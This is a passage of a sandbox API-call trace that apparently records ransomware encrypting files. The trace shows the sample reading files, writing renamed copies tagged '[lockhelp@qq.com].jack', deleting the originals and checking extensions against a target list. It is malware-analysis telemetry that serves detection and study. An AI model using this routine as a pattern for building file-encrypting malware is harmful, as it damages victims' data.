lpNewFilePointer=0x0) returned 1 [0197.911] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.911] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.911] GetLastError () returned 0x0 [0197.911] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x12f70, lpOverlapped=0x0) returned 1 [0198.023] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x12f80, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x12f80, lpOverlapped=0x0) returned 1 [0198.027] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.027] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.028] SetEndOfFile (hFile=0x404) returned 1 [0198.028] CloseHandle (hObject=0x404) returned 1 [0198.031] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.031] SetEndOfFile (hFile=0x3fc) returned 1 [0198.033] CloseHandle (hObject=0x3fc) returned 1 [0198.033] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.033] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 1 [0198.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.033] lstrlenW (lpString=".doc") returned 4 [0198.034] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString=".docx") returned 5 [0198.034] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.034] lstrlenW (lpString=".pdf") returned 4 [0198.034] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString=".xls") returned 4 [0198.034] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString=".xlsx") returned 5 [0198.034] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.034] lstrlenW (lpString=".ppt") returned 4 [0198.034] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.034] lstrlenW (lpString=".zip") returned 4 [0198.034] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.034] lstrlenW (lpString=".rar") returned 4 [0198.034] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString=".bz2") returned 4 [0198.034] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.034] lstrlenW (lpString=".7z") returned 3 [0198.034] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.034] lstrlenW (lpString=".dbf") returned 4 [0198.034] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.035] lstrlenW (lpString=".1cd") returned 4 [0198.035] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.035] lstrlenW (lpString=".jpg") returned 4 [0198.035] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.035] lstrlenW (lpString=".doc") returned 4 [0198.035] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString=".docx") returned 5 [0198.035] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.035] lstrlenW (lpString=".pdf") returned 4 [0198.035] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString=".xls") returned 4 [0198.035] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString=".xlsx") returned 5 [0198.035] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.035] lstrlenW (lpString=".ppt") returned 4 [0198.035] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.035] lstrlenW (lpString=".zip") returned 4 [0198.035] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.035] lstrlenW (lpString=".rar") returned 4 [0198.035] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString=".bz2") returned 4 [0198.035] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.035] lstrlenW (lpString=".7z") returned 3 [0198.036] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.036] lstrlenW (lpString=".dbf") returned 4 [0198.036] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.036] lstrlenW (lpString=".1cd") returned 4 [0198.036] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0198.036] lstrlenW (lpString=".jpg") returned 4 [0198.036] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.036] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.036] lstrlenW (lpString="LocalizedData.xml") returned 17 [0198.036] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.075] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=80254) returned 1 [0198.075] CloseHandle (hObject=0x3fc) returned 1 [0198.075] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 0x80 [0198.075] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.164] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.164] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.164] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.164] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.164] GetLastError () returned 0x0 [0198.164] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x1397e, lpOverlapped=0x0) returned 1 [0198.248] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13980, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13980, lpOverlapped=0x0) returned 1 [0198.251] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.251] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.251] SetEndOfFile (hFile=0x434) returned 1 [0198.251] CloseHandle (hObject=0x434) returned 1 [0198.257] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.257] SetEndOfFile (hFile=0x3dc) returned 1 [0198.259] CloseHandle (hObject=0x3dc) returned 1 [0198.259] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.259] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 1 [0198.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.260] lstrlenW (lpString=".doc") returned 4 [0198.260] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString=".docx") returned 5 [0198.260] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.260] lstrlenW (lpString=".pdf") returned 4 [0198.260] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString=".xls") returned 4 [0198.260] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString=".xlsx") returned 5 [0198.260] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.260] lstrlenW (lpString=".ppt") returned 4 [0198.260] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.260] lstrlenW (lpString=".zip") returned 4 [0198.260] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.260] lstrlenW (lpString=".rar") returned 4 [0198.260] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString=".bz2") returned 4 [0198.260] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.260] lstrlenW (lpString=".7z") returned 3 [0198.260] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.260] lstrlenW (lpString=".dbf") returned 4 [0198.260] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.261] lstrlenW (lpString=".1cd") returned 4 [0198.261] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.261] lstrlenW (lpString=".jpg") returned 4 [0198.261] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.261] lstrlenW (lpString=".doc") returned 4 [0198.261] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString=".docx") returned 5 [0198.261] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.261] lstrlenW (lpString=".pdf") returned 4 [0198.261] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString=".xls") returned 4 [0198.261] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString=".xlsx") returned 5 [0198.261] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.261] lstrlenW (lpString=".ppt") returned 4 [0198.261] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.261] lstrlenW (lpString=".zip") returned 4 [0198.261] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.261] lstrlenW (lpString=".rar") returned 4 [0198.261] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString=".bz2") returned 4 [0198.261] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.261] lstrlenW (lpString=".7z") returned 3 [0198.262] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.262] lstrlenW (lpString=".dbf") returned 4 [0198.262] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.262] lstrlenW (lpString=".1cd") returned 4 [0198.262] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0198.262] lstrlenW (lpString=".jpg") returned 4 [0198.262] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.262] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.262] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0198.263] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.263] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=201796) returned 1 [0198.263] CloseHandle (hObject=0x3dc) returned 1 [0198.263] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 0x80 [0198.263] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.263] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.263] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.263] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.263] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.264] GetLastError () returned 0x0 [0198.264] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x31444, lpOverlapped=0x0) returned 1 [0198.299] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x31450, lpOverlapped=0x0) returned 1 [0198.303] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.303] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.303] SetEndOfFile (hFile=0x434) returned 1 [0198.303] CloseHandle (hObject=0x434) returned 1 [0198.731] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.731] SetEndOfFile (hFile=0x3dc) returned 1 [0198.733] CloseHandle (hObject=0x3dc) returned 1 [0198.733] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.733] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 1 [0198.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.734] lstrlenW (lpString=".doc") returned 4 [0198.734] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.734] lstrlenW (lpString=".docx") returned 5 [0198.734] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.734] lstrlenW (lpString=".pdf") returned 4 [0198.734] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.734] lstrlenW (lpString=".xls") returned 4 [0198.734] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.734] lstrlenW (lpString=".xlsx") returned 5 [0198.734] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.734] lstrlenW (lpString=".ppt") returned 4 [0198.734] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.734] lstrlenW (lpString=".zip") returned 4 [0198.734] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.734] lstrlenW (lpString=".rar") returned 4 [0198.734] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString=".bz2") returned 4 [0198.735] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString=".7z") returned 3 [0198.735] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.735] lstrlenW (lpString=".dbf") returned 4 [0198.735] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.735] lstrlenW (lpString=".1cd") returned 4 [0198.735] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.735] lstrlenW (lpString=".jpg") returned 4 [0198.735] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.735] lstrlenW (lpString=".doc") returned 4 [0198.735] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString=".docx") returned 5 [0198.735] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0198.735] lstrlenW (lpString=".pdf") returned 4 [0198.735] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString=".xls") returned 4 [0198.735] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.735] lstrlenW (lpString=".xlsx") returned 5 [0198.735] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0198.736] lstrlenW (lpString=".ppt") returned 4 [0198.736] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.736] lstrlenW (lpString=".zip") returned 4 [0198.736] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.736] lstrlenW (lpString=".rar") returned 4 [0198.736] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.736] lstrlenW (lpString=".bz2") returned 4 [0198.736] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.736] lstrlenW (lpString=".7z") returned 3 [0198.736] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.736] lstrlenW (lpString=".dbf") returned 4 [0198.736] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.736] lstrlenW (lpString=".1cd") returned 4 [0198.736] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.736] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0198.736] lstrlenW (lpString=".jpg") returned 4 [0198.736] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.736] lstrcmpiW (lpString1=".bmp", lpString2=".jack") returned -1 [0198.736] lstrlenW (lpString="SplashScreen.bmp") returned 16 [0198.737] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.737] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=41080) returned 1 [0198.737] CloseHandle (hObject=0x3dc) returned 1 [0198.737] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 0x80 [0198.737] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.737] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0198.737] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.737] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.737] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0198.738] GetLastError () returned 0x0 [0198.738] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xa078, lpOverlapped=0x0) returned 1 [0198.779] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xa080, lpOverlapped=0x0) returned 1 [0198.781] ReadFile (in: hFile=0x3dc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.781] WriteFile (in: hFile=0x434, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf4, lpOverlapped=0x0) returned 1 [0198.781] SetEndOfFile (hFile=0x434) returned 1 [0198.781] CloseHandle (hObject=0x434) returned 1 [0198.784] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.784] SetEndOfFile (hFile=0x3dc) returned 1 [0198.786] CloseHandle (hObject=0x3dc) returned 1 [0198.786] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.786] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 1 [0198.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.786] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0198.786] lstrlenW (lpString=".doc") returned 4 [0198.786] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0198.787] lstrlenW (lpString=".docx") returned 5 [0198.787] lstrcmpiW (lpString1=".docx", 